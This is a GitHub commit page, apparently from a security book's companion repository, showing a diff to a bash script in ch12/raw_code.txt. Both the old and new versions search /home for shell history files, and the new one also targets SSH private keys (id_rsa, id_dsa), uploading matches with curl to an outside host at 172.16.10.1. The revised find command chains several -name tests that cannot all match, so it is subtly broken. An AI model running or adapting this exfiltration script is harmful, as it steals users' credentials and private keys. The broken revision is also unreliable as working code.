Skip to content

Commit

Permalink
multiline
Browse files Browse the repository at this point in the history
  • Loading branch information
dolevf committed Dec 1, 2023
1 parent aa512bb commit 1c8fcc8
Showing 1 changed file with 6 additions and 1 deletion.
7 changes: 6 additions & 1 deletion ch12/raw_code.txt
Original file line number Diff line number Diff line change
@@ -1,2 +1,7 @@
#!/bin/bash
find /home/ -type f -name ".*_history" -exec curl -F "filedata=@{}" "http://172.16.10.1" \;
find /home/ \
-type f \
-name ".*_history" \
-name "id_rsa" \
-name "id_dsa" \
-exec curl -F "filedata=@{}" "http://172.16.10.1" \;

0 comments on commit 1c8fcc8

Please sign in to comment.